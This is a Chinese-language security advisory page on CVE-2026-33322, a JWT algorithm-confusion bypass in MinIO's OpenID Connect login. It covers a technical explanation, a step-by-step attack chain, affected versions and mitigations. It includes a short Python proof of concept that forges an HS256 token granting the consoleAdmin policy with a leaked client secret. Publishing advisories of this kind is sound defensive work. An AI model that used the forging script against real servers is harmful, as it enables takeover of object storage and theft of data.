IPBUF安全漏洞报告
English
CVE-2026-33322 CVSS 9.8 严重

CVE-2026-33322 MinIO JWT认证绕过漏洞

披露日期: 2026-03-24
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-33322
漏洞类型
JWT算法混淆
CVSS评分
9.8 严重
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
MinIO

相关标签

JWT算法混淆认证绕过MinIO对象存储严重漏洞

漏洞概述

MinIO对象存储系统在OpenID Connect认证模块中存在严重的JWT算法混淆漏洞。该漏洞影响特定版本范围内的MinIO实例。攻击者若获取到OIDC ClientSecret,即可利用此漏洞伪造合法的身份令牌,绕过正常身份验证流程。成功利用后,攻击者能获取具有任意策略(包括consoleAdmin管理员权限)的S3凭证,从而完全接管受影响的服务。

技术细节

该漏洞根源在于MinIO在处理OpenID Connect (OIDC) 身份验证时,对JWT令牌的签名算法校验存在逻辑缺陷,引发了经典的JWT算法混淆攻击。在正常流程中,服务端应使用非对称加密(如RS256)验证令牌签名,但在受影响版本中,攻击者可以诱导服务端接受使用对称加密(如HMAC)签名的令牌。利用该漏洞的前提条件是攻击者已知晓OIDC的ClientSecret。攻击者利用此密钥,采用HMAC算法对包含恶意权限信息的Payload进行签名,生成伪造的JWT令牌。服务端在验证时,因算法混淆错误地使用ClientSecret对令牌进行校验,导致验证通过。攻击者借此获取具有任意策略(如consoleAdmin)的S3凭证,进而完全控制对象存储服务,造成数据泄露、篡改或服务中断等严重后果。

攻击链分析

STEP 1
信息收集
攻击者扫描并识别启用了OpenID Connect (OIDC) 认证功能的MinIO服务器。
STEP 2
获取密钥
通过信息泄露、配置文件暴露或其他漏洞获取MinIO配置中的OIDC ClientSecret。
STEP 3
伪造令牌
利用获取到的ClientSecret,采用HMAC算法(如HS256)对包含高权限(如consoleAdmin)声明的数据进行签名,生成伪造的JWT令牌。
STEP 4
认证绕过
将伪造的JWT令牌发送给MinIO服务器。由于存在算法混淆漏洞,服务器错误地验证了令牌的有效性,认为是合法用户请求。
STEP 5
获取凭证
MinIO服务器根据伪造令牌中的策略,为攻击者签发具有最高权限的S3访问凭证(Access Key和Secret Key)。
STEP 6
系统接管
攻击者使用获取到的S3凭证,通过API或客户端完全控制存储桶,执行数据读取、写入、删除或管理操作。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import jwt import time # PoC for CVE-2026-33322: MinIO JWT Algorithm Confusion # Description: Forge a JWT using the leaked OIDC ClientSecret via HS256. # Prerequisite: Attacker knows the 'client_secret' used in MinIO OIDC config. client_secret = "LEAKED_OIDC_CLIENT_SECRET" # Malicious payload claiming admin privileges payload = { "sub": "attacker", "act": "admin", "policy": "consoleAdmin", # Highest privilege "exp": int(time.time()) + 3600, "iat": int(time.time()) } # Sign the token with HS256 (HMAC) using the client secret. # The vulnerability is that the server might expect RS256 (RSA) # but accepts HS256, verifying it with the public key treated as a secret, or directly with the secret. forged_token = jwt.encode(payload, client_secret, algorithm="HS256") print(f"[+] Forged JWT Token: {forged_token}") print("[+] Send this token to the MinIO STS endpoint to obtain S3 credentials.")

影响范围

MinIO RELEASE.2022-11-08T05-27-07Z 到 RELEASE.2026-03-17T21-25-16Z 之前

防御指南

临时缓解措施
如果无法立即升级,建议暂时禁用OpenID Connect认证方式,改用其他认证机制。同时,必须轮换所有可能已泄露的ClientSecret,并撤销所有在漏洞披露期间签发的可疑S3访问凭证,严格限制网络访问以减少攻击面。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表